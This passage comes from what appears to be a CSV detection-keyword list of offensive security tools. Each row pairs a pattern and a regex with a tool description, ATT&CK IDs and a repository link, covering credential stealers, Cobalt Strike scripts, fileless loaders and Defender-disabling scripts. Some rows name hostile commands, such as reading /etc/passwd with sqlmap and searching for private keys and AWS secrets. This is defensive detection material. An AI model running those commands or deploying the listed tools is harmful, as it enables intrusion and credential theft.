"*fff54c4b8a879869c50760512e87a39578fea5e07ecead1086af4b50561b5453*",".{0,1000}fff54c4b8a879869c50760512e87a39578fea5e07ecead1086af4b50561b5453.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ffnbelfdoeiohenkjibnmadjiehjhajb*",".{0,1000}ffnbelfdoeiohenkjibnmadjiehjhajb.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ffuf *-input-cmd*",".{0,1000}ffuf\s.{0,1000}\-input\-cmd.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf *-u http*",".{0,1000}ffuf\s.{0,1000}\-u\shttp.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf -c *",".{0,1000}ffuf\s\-c\s.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf -fs 185 -c -w *",".{0,1000}ffuf\s\-fs\s185\s\-c\s\-w\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ffuf -w *",".{0,1000}ffuf\s\-w\s.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf.exe*",".{0,1000}ffuf\.exe.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf/ffuf*",".{0,1000}ffuf\/ffuf.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_freebsd_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_freebsd_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_linux_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_linux_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_macOS_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_macOS_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_openbsd_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_openbsd_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_windows_*.zip*",".{0,1000}ffuf_.{0,1000}_windows_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf-master.zip*",".{0,1000}ffuf\-master\.zip.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*fgdump.exe*",".{0,1000}fgdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fgexec.exe*",".{0,1000}fgexec\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fhbohimaelbohpjbbldcngcnapndodjp*",".{0,1000}fhbohimaelbohpjbbldcngcnapndodjp.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*fhilaheimglignddkjgofkcbgekhenbh*",".{0,1000}fhilaheimglignddkjgofkcbgekhenbh.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*fierce --domain* --dns-servers *",".{0,1000}fierce\s\-\-domain.{0,1000}\s\-\-dns\-servers\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*FiercePhish*",".{0,1000}FiercePhish.{0,1000}","offensive_tool_keyword","FiercePhish","FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. ","T1566 - T1566.001 - T1566.002 - T1566.003","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Phishing","https://github.com/Raikia/FiercePhish","1","1","N/A","N/A","10","1267","251","2024-01-09T02:59:26Z","2016-12-31T19:41:24Z" "*Fiesta Exploit Kit*",".{0,1000}Fiesta\sExploit\sKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*-file *.bin -instanceid 1337 - source persistence*",".{0,1000}\-file\s.{0,1000}\.bin\s\-instanceid\s1337\s\-\ssource\spersistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*--file dnschef.ini *",".{0,1000}\-\-file\sdnschef\.ini\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*File Generated Successfully.Run Defeat-Defender.bat on target machine*",".{0,1000}File\sGenerated\sSuccessfully\.Run\sDefeat\-Defender\.bat\son\starget\smachine.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*file_parsers/group_policy_preferences.py*",".{0,1000}file_parsers\/group_policy_preferences\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*File_Smuggler_Http_Handler*",".{0,1000}File_Smuggler_Http_Handler.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*FILE_TO_EXFIL = ""*",".{0,1000}FILE_TO_EXFIL\s\=\s\"".{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*FileControler/FileControler_x64.dll*",".{0,1000}FileControler\/FileControler_x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*FileControler/FileControler_x86.dll*",".{0,1000}FileControler\/FileControler_x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*File-Extensions-Wordlist.txt*",".{0,1000}File\-Extensions\-Wordlist\.txt.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*Fileless Lateral Movement.csproj*",".{0,1000}Fileless\sLateral\sMovement\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*fileless-elf-exec*",".{0,1000}fileless\-elf\-exec.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*FilelessPELoader.cpp*",".{0,1000}FilelessPELoader\.cpp.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessPELoader.exe*",".{0,1000}FilelessPELoader\.exe.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessPELoader.sln*",".{0,1000}FilelessPELoader\.sln.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessPELoader.vcxproj*",".{0,1000}FilelessPELoader\.vcxproj.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessPELoader-main*",".{0,1000}FilelessPELoader\-main.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessShellcode.cpp*",".{0,1000}FilelessShellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*FilelessShellcode.exe*",".{0,1000}FilelessShellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*FilelessShellcode.sln*",".{0,1000}FilelessShellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*FilelessShellcode.vcxproj*",".{0,1000}FilelessShellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*FileMonitor has injected FileMonitorHook into process *",".{0,1000}FileMonitor\shas\sinjected\sFileMonitorHook\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*filemsf.py*",".{0,1000}filemsf\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*--file-read=/etc/passwd*",".{0,1000}\-\-file\-read\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*files/BindShell.exe*",".{0,1000}files\/BindShell\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*files/team-edward.py*",".{0,1000}files\/team\-edward\.py.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*filetype:credentials* AND ((client_id OR clientID) AND (tenant) AND (secret))*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(\(client_id\sOR\sclientID\)\sAND\s\(tenant\)\sAND\s\(secret\)\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*filetype:credentials* AND (\""AWS_ACCESS_KEY_ID\"" OR \""AWS_SECRET_ACCESS_KEY\""*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(\\\""AWS_ACCESS_KEY_ID\\\""\sOR\s\\\""AWS_SECRET_ACCESS_KEY\\\"".{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*filetype:credentials* AND (begin NEAR(n=1) (RSA OR OPENSSH OR DSA OR EC OR PGP) NEAR(n=1) KEY)*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(begin\sNEAR\(n\=1\)\s\(RSA\sOR\sOPENSSH\sOR\sDSA\sOR\sEC\sOR\sPGP\)\sNEAR\(n\=1\)\sKEY\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*filetype:pem*AND (\""BEGIN RSA PRIVATE KEY\"" OR \""BEGIN DSA PRIVATE KEY\"" OR \""BEGIN EC PRIVATE KEY\*",".{0,1000}filetype\:pem.{0,1000}AND\s\(\\\""BEGIN\sRSA\sPRIVATE\sKEY\\\""\sOR\s\\\""BEGIN\sDSA\sPRIVATE\sKEY\\\""\sOR\s\\\""BEGIN\sEC\sPRIVATE\sKEY\\.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*filezilla2john.py*",".{0,1000}filezilla2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*fin3ss3g0d/ASPJinjaObfuscator*",".{0,1000}fin3ss3g0d\/ASPJinjaObfuscator.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*finalrecon.py --*",".{0,1000}finalrecon\.py\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*find . -name spring-beans*.jar*",".{0,1000}find\s\.\s\-name\sspring\-beans.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","N/A","N/A","4","347","105","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" "*find / * -4000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-4000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*find / * -perm -2000 -type f 